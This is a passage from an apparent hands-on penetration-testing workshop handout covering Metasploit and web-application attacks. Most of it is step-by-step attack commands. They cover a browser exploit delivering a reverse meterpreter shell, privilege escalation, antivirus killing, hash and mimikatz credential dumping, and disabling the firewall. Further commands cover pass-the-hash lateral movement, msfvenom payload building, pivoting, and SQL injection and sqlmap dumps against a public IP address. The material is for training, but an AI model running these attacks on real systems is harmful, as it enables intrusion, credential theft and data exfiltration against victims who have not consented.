1193-----------------------------------------------------------------------
1194
1195##############################################
1196# Run any Linux command inside of MSFConsole #
1197##############################################
1198
1199---------------------------Type This-----------------------------------
1200ls
1201
1202pwd
1203
1204ping -c1 yahoo.com
1205
1206nmap 192.168.11.130
1207
1208nmap yahoo.com
1209-----------------------------------------------------------------------
1210
1211
1212
1213- You're on the outside scanning publicly accessable targets.
1214
1215
1216---------------------------Type This-----------------------------------
1217use auxiliary/scanner/portscan/tcp
1218
1219set RHOSTS 162.243.126.247
1220
1221set PORTS 80,443,445
1222
1223run
1224------------------------------------------------------------------------
1225
1226- In my opinion a much better option is a script called 'discover' from Lee Baird.
1227
1228- You can get it here: https://github.com/leebaird/discover
1229
1230- On the Ubuntu attack host you can run discover by typing the following:
1231---------------------------Type This-----------------------------------
1232cd ~/toolz/discover
1233sudo ./discover
1234-----------------------------------------------------------------------
1235
1236- From here you can just follow the prompts. It will run both Nmap NSE scripts and Metasploit aux modules with all of the correct parameters for you.
1237
1238
1239##################################
1240# Basic Client-Side Exploitation #
1241##################################
1242---------------------------Type This-----------------------------------
1243sudo /sbin/iptables -F
1244
1245cd ~/toolz/metasploit
1246
1247./msfconsole
1248
1249use exploit/windows/browser/ie_cgenericelement_uaf
1250
1251set ExitOnSession false
1252
1253set URIPATH /ie8
1254
1255set PAYLOAD windows/meterpreter/reverse_tcp
1256
1257set LHOST 192.168.11.129
1258
1259exploit -j
1260----------------------------------------------------------------------
1261
1262- Now from the Win7 host, use Internet Explorer 8 to connect to the exploit address (local address)
1263- given to you by metasploit.
1264
1265- The address will be something like:
1266
1267http://192.168.11.129:8080/ie8 (Make sure you change this to your ubuntu ip address)
1268
1269
1270
1271- This will simulate a victim clicking on your malicious link and being exploited with a browser exploit.
1272
1273
1274###########################
1275# Client-Side Enumeration #
1276###########################
1277
1278
1279- You can list the active sessions by typing:
1280---------------------------Type This-----------------------------------
1281sessions -l
1282
1283
1284
1285
1286- You can "interact" with any active session by typing sessions -i 3 (replace 3 with the session number you want to interact with)
1287
1288---------------------------Type This-----------------------------------
1289sessions -i 1
1290
1291
1292
1293
1294
1295- You should now see Metasploit's meterpreter prompt.
1296
1297
1298********************************** Figure out who and where you are **********************************
1299
1300---------------------------Type This-----------------------------------
1301meterpreter> sysinfo
1302
1303
1304meterpreter> getuid
1305
1306
1307meterpreter> ipconfig
1308
1309
1310meterpreter> run post/windows/gather/checkvm
1311
1312
1313
1314
1315********************************** Escalate privileges and get hashes **********************************
1316
1317
1318--Option 1: GetSystem
1319---------------------------Type This-----------------------------------
1320meterpreter> getsystem
1321
1322--Option 2:
1323---------------------------Type This-----------------------------------
1324meterpreter > run post/windows/escalate/getsystem
1325
1326--Option 3:
1327---------------------------Type This-----------------------------------
1328meterpreter> background
1329back
1330use post/windows/escalate/droplnk
1331set SESSION 1
1332set PAYLOAD windows/meterpreter/reverse_tcp
1333set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1334set LPORT 1234
1335exploit
1336
1337--Option 4:
1338---------------------------Type This-----------------------------------
1339use exploit/windows/local/bypassuac
1340set SESSION 1
1341set PAYLOAD windows/meterpreter/reverse_tcp
1342set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1343set LPORT 12345
1344exploit
1345
1346--Option 5:
1347---------------------------Type This-----------------------------------
1348use exploit/windows/local/service_permissions
1349set SESSION 1
1350set PAYLOAD windows/meterpreter/reverse_tcp
1351set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1352set LPORT 5555
1353exploit
1354
1355--Option 6:
1356---------------------------Type This-----------------------------------
1357use exploit/windows/local/trusted_service_path
1358set SESSION 1
1359set PAYLOAD windows/meterpreter/reverse_tcp
1360set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1361set LPORT 4567
1362exploit
1363
1364
1365--Option 7:
1366---------------------------Type This-----------------------------------
1367use exploit/windows/local/ppr_flatten_rec
1368set SESSION 1
1369set PAYLOAD windows/meterpreter/reverse_tcp
1370set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1371set LPORT 7777
1372exploit
1373
1374--Option 8:
1375---------------------------Type This-----------------------------------
1376use exploit/windows/local/ms_ndproxy
1377set SESSION 1
1378set PAYLOAD windows/meterpreter/reverse_tcp
1379set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1380set LPORT 7788
1381exploit
1382
1383
1384--Option 9:
1385---------------------------Type This-----------------------------------
1386use exploit/windows/local/ask
1387set SESSION 1
1388set PAYLOAD windows/meterpreter/reverse_tcp
1389set LHOST 192.168.11.129 (Make sure you change this to your ubuntu ip address)
1390set LPORT 7799
1391exploit
1392
1393
1394meterpreter > getuid
1395Server username: win7-64-victim\Workshop
1396meterpreter > getsystem
1397...got system (via technique 1).
1398meterpreter > getuid
1399Server username: NT AUTHORITY\SYSTEM
1400
1401--------------------------------------------------------
1402
1403meterpreter> run killav
1404
1405meterpreter> run post/windows/gather/hashdump
1406
1407meterpreter > ps (search for a process running as NT AUTHORITY\SYSTEM)
1408
1409meterpreter > migrate 2800 (your process id WILL NOT be 2800, but make sure you use one that is running at NT AUTHORITY\SYSTEM)
1410
1411meterpreter> run post/windows/gather/credentials/credential_collector
1412-----------------------------------------------------------------------
1413
1414#####################
1415# Fix broken PSExec #
1416#####################
1417- We use the shell command to get to the Victim Dos command so we can add a registry field.
1418---------------------------Type This-----------------------------------
1419meterpreter > execute -c -H -f cmd -a "/k" -i
1420
1421
1422
1423- Created a registry field to the Victim computer, this will allow us to access the machine using and exploit via PSEXEC.
1424---------------------------Type This-----------------------------------
1425C:\Windows\system32> reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1
1426
1427---------------------------Type This-----------------------------------
1428c:\Windows\system32> netsh advfirewall set allprofiles state off
1429
1430********************************** Steal Tokens **********************************
1431---------------------------Type This-----------------------------------
1432meterpreter > getsystem
1433
1434meterpreter > use incognito
1435
1436meterpreter > list_tokens -u
1437
1438meterpreter > list_tokens -g
1439---------------------------Type This-----------------------------------
1440
1441NOTE: These commands will not work as your VM is not connected to Active Directory. They are provided so you can have the syntax.
1442
1443---------------------------Type This-----------------------------------
1444meterpreter > impersonate_token <-- choose who you want to impersonate but be sure to use 2 slashes in the name (ex: impersonate_token domain\\user)
1445
1446meterpreter> getuid
1447
1448
1449************ Stealing credentials and certificates ************
1450- NOTE: Most of the stuff after 'kerberos' DOES NOT work, but is given here so you know the correct syntax to use when connected to AD or dealing with smart/CAC cards.
1451---------------------------Type This-----------------------------------
1452meterpreter > getsystem
1453
1454meterpreter > load mimikatz
1455
1456meterpreter > kerberos
1457
1458
1459NOTE: These commands will not work as your VM is not connected to Active Directory. They are provided so you can have the syntax.
1460
1461
1462meterpreter > mimikatz_command -f sekurlsa::logonPasswords -a "full"
1463
1464meterpreter > msv <-- Your AD password
1465
1466meterpreter > livessp <-- Your Windows8 password
1467
1468meterpreter > ssp <-- Your outlook password
1469
1470meterpreter > tspkg <-- Your AD password
1471
1472meterpreter > wdigest <-- Your AD password
1473
1474meterpreter > mimikatz_command -f crypto::listStores
1475
1476meterpreter > mimikatz_command -f crypto::listCertificates
1477
1478meterpreter > mimikatz_command -f crypto::exportCertificates CERT_SYSTEM_STORE_CURRENT_USER
1479
1480meterpreter > mimikatz_command -f crypto::patchcapi
1481
1482meterpreter> search -d <directory> -f <file-pattern>
1483
1484
1485********************************** Enumerate the host you are on **********************************
1486---------------------------Type This-----------------------------------
1487meterpreter > run post/windows/gather/enum_applications
1488
1489meterpreter > run post/windows/gather/enum_logged_on_users
1490
1491meterpreter > run post/windows/gather/usb_history
1492
1493meterpreter > run post/windows/gather/enum_shares
1494
1495meterpreter > run post/windows/gather/enum_snmp
1496
1497meterpreter> reg enumkey -k HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
1498
1499
1500
1501********************************** Lateral Movement *******************************
1502
1503
1504Now we can run the PSEXEC exploit.
1505-- Option 1:
1506---------------------------Type This-----------------------------------
1507use exploit/windows/smb/psexec
1508
1509set SMBUser Workshop
1510
1511set SMBPass password
1512
1513set RHOST 192.168.11.130
1514
1515set payload windows/meterpreter/reverse_tcp
1516
1517set LHOST 192.168.11.129
1518
1519set LPORT 2345
1520
1521exploit
1522
1523
1524
1525
1526-- Option 2:
1527---------------------------Type This-----------------------------------
1528use exploit/windows/smb/psexec
1529
1530set SMBUser Workshop
1531
1532set SMBPass aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c
1533
1534set payload windows/meterpreter/reverse_tcp
1535
1536set RHOST 192.168.11.130
1537
1538set LHOST 192.168.11.129
1539
1540set LPORT 5678
1541
1542exploit
1543
1544
1545##################
1546# Day 2 Homework #
1547##################
1548
1549---------------------------------------------------------------------------------
1550
1551Day 2 Homework:
1552Send Ivana an email ivana{a-t}strategicsec{d-o-t}.com with a word document that contains screenshots of everything that we have covered so far. Make the subject of the email "First Name - Last Name - Metasploit Day 2" (ex: Joseph - McCray - Metasploit Day 2).
1553
1554Please take screenshots of you doing the first 10 videos in this playlist and add them to this document.
1555https://www.youtube.com/playlist?list=PL1512BD72E7C9FFCA
1556
1557Also be sure to name the attached file "FirstName.LastName.MetasploitDay2.docx" (Joseph.McCray.MetasploitDay2.docx).
1558
1559NOTE: This is what is required in order to receive your certificate of completion and CPEs.
1560---------------------------------------------------------------------------------
1561
1562
1563
1564#################################################
1565# Section 3: Writing Meterpreter Resource Files #
1566#################################################
1567
1568
1569- In this lab we are going to create a binary payload via msfpayload then craft a .rc file that automates the
1570process to setup the multi handler listener.
1571
1572- We will start off by creating the msfvenom
1573---------------------------Type This-----------------------------------
1574sudo /sbin/iptables -F
1575 strategicsec
1576
1577cd ~/toolz/metasploit
1578
1579./msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.11.129 -f exe > /home/infosecaddicts/Desktop/meterpreter.exe
1580
1581sudo chmod 777 /home/infosecaddicts/Desktop/meterpreter.exe
1582
1583- In the syntax above, we set the payload, set the local host address to connect back too, then redirected the
1584malicious payload to our desktop by issuing the correct path. We will also change the permissions on it to 777 just
1585to make it easy for us to use WinSCP to copy it over to our Win7 machine.
1586
1587- Next we are going to create a .rc (resource file) file that will automate the process for setting up a listener.
1588
1589- Navigate to the /home/infosecaddicts/toolz/metasploit/ so that when you create the .rc file you can save it in the
1590working directory.
1591
1592
1593- Type 'touch meterpreter.rc' to create the file.
1594---------------------------Type This-----------------------------------
1595touch meterpreter.rc
1596
1597- Type 'echo use exploit/multi/handler >> meterpreter.rc' to be appended to the .rc file.
1598echo use exploit/multi/handler >> meterpreter.rc
1599
1600- Type 'echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc' to be appended to the .rc file.
1601echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
1602
1603- Type 'echo set LHOST 192.168.11.129>> meterpreter.rc' to be appended to the .rc file.
1604echo set LHOST 192.168.11.129>> meterpreter.rc
1605
1606- Type 'echo exploit -j -z >> meterpreter.rc' to be appended to the .rc file.
1607echo exploit -j -z >> meterpreter.rc
1608
1609- Then cat the meterpreter.rc out to verify that everything in the file looks ok.
1610cat meterpreter.rc
1611
1612Now at the command prompt, type 'sudo ./msfconsole -r meterpreter.rc' to start the msfconsole module and call/run
1613
1614the 'meterpreter.rc' file.
1615./msfconsole -r meterpreter.rc
1616
1617- Once the msfconsole starts, the meterpreter resource file is executed and the listener is automatically setup. It is now listening for a connection!
1618
1619- Now you must transfer the malicious meterpreter payload to the victim machine (you may do so by any means necessary, we have physical access so we transferred it via usb.
1620
1621- Click on the payload and create the meterpreter session.
1622
1623- Type 'sessions -l' to list your open sessions, and 'sessions -i 1' to indicate that you want to interact with
1624
1625meterpreter session under id 1.
1626
1627exit -y
1628
1629
1630
1631
1632***********************************
1633* Getting Serious About .rc files *
1634***********************************
1635
1636---------------------------Type This-----------------------------------
1637touch /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1638
1639echo run getcountermeasure >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1640
1641echo run winenum >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1642
1643echo run post/windows/gather/enum_applications >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1644
1645echo run post/windows/gather/enum_logged_on_users >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1646
1647echo run post/windows/gather/checkvm >> /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1648
1649
1650
1651- Ok, that was fun. Now let's take a quick look at the .rc file we just created.
1652---------------------------Type This-----------------------------------
1653cat /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1654
1655
1656
1657
1658touch /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1659
1660
1661echo use exploit/windows/browser/ie_cgenericelement_uaf >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1662
1663echo set ExitOnSession true >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1664
1665echo set URIPATH /ie8 >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1666
1667echo set PAYLOAD windows/meterpreter/reverse_tcp >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1668
1669echo set LHOST 192.168.11.129 >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1670
1671
1672
1673echo set AutoRunScript multi_console_command -rc /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1674
1675echo exploit -j -z >> /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1676
1677
1678
1679- Ok, that was more fun than the previous one. Now let's take a quick look at the .rc file we just created.
1680---------------------------Type This-----------------------------------
1681cat /home/infosecaddicts/toolz/metasploit/autorun-walk-through.rc
1682
1683cat /home/infosecaddicts/toolz/metasploit/old-faithful-ie8.rc
1684
1685- Alright, enough already. Let's run this thing.
1686./msfconsole -r old-faithful-ie8.rc
1687
1688
1689
1690###########################################
1691# Section 4: Custom Meterpreter Scripting #
1692###########################################
1693---------------------------Type This-----------------------------------
1694cd ~
1695mkdir binaries
1696cd ~/binaries
1697wget https://s3.amazonaws.com/infosecaddictsfiles/wce.exe
1698wget https://s3.amazonaws.com/infosecaddictsfiles/nc.exe
1699wget https://s3.amazonaws.com/infosecaddictsfiles/mimikatz.exe
1700-----------------------------------------------------------------------
1701- In this lab we will be looking at how you can use some custom Meterpreter scripts to do more than what Metasploit
1702
1703can offer. This will also show you the flexibility of the Meterpreter scripts.
1704
1705- We're going to start off with a simple Hello World script first.
1706
1707---------------------------Type This-----------------------------------
1708echo 'print_status("Hello World")' > /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
1709-----------------------------------------------------------------------
1710
1711- This next portion is up to you, exploit your test box and end up with a Meterpreter shell.
1712
1713- Lets test out our helloworld.rb Meterpreter script.
1714
1715---------------------------Type This-----------------------------------
1716meterpreter> run helloworld
1717
1718
1719- So far so good, now we can build on this base. Lets add a couple more API calls to the script.
1720
1721- Open /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb in your favorite and add following
1722
1723line.
1724---------------------------Type This-----------------------------------
1725vi /home/infosecaddicts/toolz/metasploit/scripts/meterpreter/helloworld.rb
1726
1727
1728---------------------------Type This-----------------------------------
1729print_error("this is an error!")
1730print_line("this is a line")
1731
1732- Now run the script:
1733
1734meterpreter> run helloworld
1735
1736
1737- Now that we have the basics down, we're going to do something a little more exciting.
1738- The architecture to follow when creating these scripts goes as follows:
1739
1740def getinfo(session)
1741 begin
1742 <stuff goes here>
1743 rescue ::Exception => e
1744 <stuff goes here>
1745 end
1746end
1747
1748-----------------------------------------------------------------------
1749- Copy and paste the following code into our helloworld.rb script:
1750---------------------------Type This-----------------------------------
1751def getinfo(session)
1752 begin
1753 sysnfo = session.sys.config.sysinfo
1754 runpriv = session.sys.config.getuid
1755 print_status("Getting system information ...")
1756 print_status("The target machine OS is #{sysnfo['OS']}")
1757 print_status("The computer name is #{'Computer'} ")
1758 print_status("Script running as #{runpriv}")
1759 rescue ::Exception => e
1760 print_error("The following error was encountered #{e}")
1761 end
1762end
1763
1764getinfo(client)
1765--------------------------------------------------------------------------
1766
1767
1768- Now run the script:
1769---------------------------Type This-----------------------------------
1770meterpreter> run helloworld
1771
1772
1773- We can expand it by adding actual system commands to the script, lets look at how we can do this.
1774
1775---------------------------Type This-----------------------------------
1776def list_exec(session,cmdlst)
1777 print_status("Running Command List ...")
1778 r=''
1779 session.response_timeout=120
1780 cmdlst.each do |cmd|
1781 begin
1782 print_status "running command #{cmd}"
1783 r = session.sys.process.execute("cmd.exe /c #{cmd}", nil, {'Hidden' => true, 'Channelized' => true})
1784 while(d = r.channel.read)
1785
1786 print_status("#{d}")
1787 end
1788 r.channel.close
1789 r.close
1790 rescue ::Exception => e
1791 print_error("Error Running Command #{cmd}: #{e.class} #{e}")
1792 end
1793 end
1794 end
1795
1796commands = [ "set",
1797 "ipconfig /all",
1798 "arp -a"]
1799
1800list_exec(client,commands)
1801------------------------------------------------------------------------
1802
1803
1804- Run the script:
1805---------------------------Type This-----------------------------------
1806meterpreter> run helloworld
1807
1808
1809Note: Add all of the commands from the script below to your helloworld.rb script:
1810https://raw.githubusercontent.com/rapid7/metasploit-framework/master/scripts/meterpreter/winenum.rb
1811
1812
1813
1814---------------------------------------------------------------------------------
1815
1816
1817###########################################
1818# Section 3: Tunneling For Fun and Profit #
1819###########################################
1820
1821*****************************Enumerate the network you are on ***************************
1822
1823meterpreter > run netenum
1824
1825meterpreter > run netenum -ps -r 192.168.200.0/24
1826
1827meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.200.0/24
1828
1829
1830
1831********************************** Set up your Pivot **********************************
1832
1833meterpreter > background
1834 <-- background the session
1835 You want to get back to this prompt:
1836 msf exploit(handler) > back <--- you need to get to main msf> prompt
1837
1838
1839
1840 sessions -l <--find a session you want to pivot through (note the IP and session number)
1841
1842 Now set up Pivot with a route add
1843 ---------------------------------
1844
1845route print
1846
1847route add CHANGEME-TO-YOUR-WIN7-IP 255.255.255.0 1 <-- Use correct session id (2), it may be 3, or 4 (make sure you are on msf> prommpt, not meterpreter)
1848
1849
1850route print <----- verify new route
1851
1852******************************Scan through your Pivot ******************************
1853
1854use auxiliary/scanner/portscan/tcp <-- Run aux modules through your pivot
1855
1856set THREADS 10
1857
1858set RHOSTS 192.168.200.0/24 <-- Keep changing this IP and re-running the scan until you find something you want to attack
1859
1860set PORTS 445
1861
1862run
1863
1864
1865####################################
1866# Socks Tunneling with Proxychains #
1867####################################
1868--- Open a duplicate putty session to your Ubuntu host
1869
1870sudo apt-get install -y proxychains
1871 strategicsec
1872
1873sudo vi /etc/proxychains.conf <--- Make sure that last line of the file is: socks4 127.0.0.1 1080
1874
1875 Comment out the proxy_dns, change the 9050 (tor port) to the metasploit socks proxy port (1080) and save it.
1876 socks4 127.0.0.1 1080
1877
1878***************************Set up a Socks Proxy through your Pivot *************************
1879
1880
1881use auxiliary/server/socks4a
1882
1883set SRVHOST 127.0.0.1
1884
1885set SRVPORT 1080
1886
1887run
1888
1889 --- Go back to your other putty session with the meterpreter shell
1890cd ~
1891
1892proxychains nmap -sT -PN -vv -sV --script=smb-os-discovery.nse -p 445 192.168.200.0/24 <--- This is going to be really slow
1893
1894proxychains nmap -sT -PN -n -sV -p 21,22,23,25,80,110,139,443,1433,1521,3306,3389,8080,10000 192.168.200.0/24 <--- This is going to be really slow
1895
1896
1897 ---close the duplicate putty session to your Ubuntu host
1898
1899##################################
1900# Basic: Web Application Testing #
1901##################################
1902
1903Most people are going to tell you reference the OWASP Testing guide.
1904https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
1905
1906I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
1907
1908
1909The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
1910
1911 1. Does the website talk to a DB?
1912 - Look for parameter passing (ex: site.com/page.php?id=4)
1913 - If yes - try SQL Injection
1914
1915 2. Can I or someone else see what I type?
1916 - If yes - try XSS
1917
1918 3. Does the page reference a file?
1919 - If yes - try LFI/RFI
1920
1921Let's start with some manual testing against 54.245.184.121
1922
1923
1924Start here:
1925http://54.245.184.121/
1926
1927
1928There's no parameter passing on the home page so the answer to question 1 is NO.
1929There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
1930
1931Try an XSS in the search box on the home page:
1932<script>alert(123);</script>
1933
1934Doing this gives us the following in the address bar:
1935http://54.245.184.121/BasicSearch.aspx?Word=<script>alert(123);</script>
1936
1937Ok, so we've verified that there is XSS in the search box.
1938
1939Let's move on to the search box in the left of the page.
1940
1941Let's give the newsletter signup box a shot
1942
1943Moving on to the login page.
1944http://54.245.184.121/login.aspx
1945
1946I entered a single quote (') for both the user name and the password. I got the following error:
1947
1948Let's try throwing a single quote (') in there:
1949
1950http://54.245.184.121/bookdetail.aspx?id=2'
1951
1952
1953I get the following error:
1954
1955Unclosed quotation mark after the character string ''.
1956Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
1957
1958Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
1959
1960
1961
1962
1963
1964
1965
1966
1967
1968
1969#########################################################################################
1970# SQL Injection #
1971# https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
1972#########################################################################################
1973
1974
1975- Another quick way to test for SQLI is to remove the paramter value
1976
1977
1978#############################
1979# Error-Based SQL Injection #
1980#############################
1981http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
1982http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
1983http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
1984http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
1985http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
1986http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
1987http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
1988http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
1989http://54.245.184.121/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
1990
1991
1992
1993
1994#############################
1995# Union-Based SQL Injection #
1996#############################
1997http://54.245.184.121/bookdetail.aspx?id=2 order by 100--
1998http://54.245.184.121/bookdetail.aspx?id=2 order by 50--
1999http://54.245.184.121/bookdetail.aspx?id=2 order by 25--
2000http://54.245.184.121/bookdetail.aspx?id=2 order by 10--
2001http://54.245.184.121/bookdetail.aspx?id=2 order by 5--
2002http://54.245.184.121/bookdetail.aspx?id=2 order by 6--
2003http://54.245.184.121/bookdetail.aspx?id=2 order by 7--
2004http://54.245.184.121/bookdetail.aspx?id=2 order by 8--
2005http://54.245.184.121/bookdetail.aspx?id=2 order by 9--
2006http://54.245.184.121/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
2007
2008 We are using a union select statement because we are joining the developer's query with one of our own.
2009 Reference:
2010 http://www.techonthenet.com/sql/union.php
2011 The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
2012 It removes duplicate rows between the various SELECT statements.
2013
2014 Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
2015
2016http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
2017
2018 Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
2019
2020http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
2021http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
2022http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
2023http://54.245.184.121/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
2024
2025
2026
2027
2028
2029- Another way is to see if you can get the backend to perform an arithmetic function
2030http://54.245.184.121/bookdetail.aspx?id=(2)
2031http://54.245.184.121/bookdetail.aspx?id=(4-2)
2032http://54.245.184.121/bookdetail.aspx?id=(4-1)
2033
2034
2035
2036http://54.245.184.121/bookdetail.aspx?id=2 or 1=1--
2037http://54.245.184.121/bookdetail.aspx?id=2 or 1=2--
2038http://54.245.184.121/bookdetail.aspx?id=1*1
2039http://54.245.184.121/bookdetail.aspx?id=2 or 1 >-1#
2040http://54.245.184.121/bookdetail.aspx?id=2 or 1<99#
2041http://54.245.184.121/bookdetail.aspx?id=2 or 1<>1#
2042http://54.245.184.121/bookdetail.aspx?id=2 or 2 != 3--
2043http://54.245.184.121/bookdetail.aspx?id=2 &0#
2044
2045
2046
2047http://54.245.184.121/bookdetail.aspx?id=2 and 1=1--
2048http://54.245.184.121/bookdetail.aspx?id=2 and 1=2--
2049http://54.245.184.121/bookdetail.aspx?id=2 and user='joe' and 1=1--
2050http://54.245.184.121/bookdetail.aspx?id=2 and user='dbo' and 1=1--
2051
2052
2053
2054###############################
2055# Blind SQL Injection Testing #
2056###############################
2057Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
2058
20593 - Total Characters
2060http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
2061http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
2062http://54.245.184.121/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
2063
2064Let's go for a quick check to see if it's DBO
2065http://54.245.184.121/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
2066
2067Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
2068
2069D - 1st Character
2070http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
2071http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
2072http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
2073http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
2074
2075B - 2nd Character
2076http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2077http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2078
2079O - 3rd Character
2080http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2081http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
2082http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2083http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2084http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
2085http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
2086http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
2087
2088
2089
2090
2091
2092 ##########
2093# Sqlmap #
2094##########
2095If you want to see how we automate all of the SQL Injection attacks you can log into your StrategicSec-Ubuntu-VM and run the following commands:
2096
2097cd /home/strategicsec/toolz/sqlmap-dev/
2098python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -b
2099python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --current-user
2100python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --current-db
2101python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" --dbs
2102python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp --tables
2103python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns
2104python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns
2105python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T BOOKMASTER --columns --dump
2106python sqlmap.py -u "http://54.245.184.121/bookdetail.aspx?id=2" -D BookApp -T sysdiagrams --columns --dump
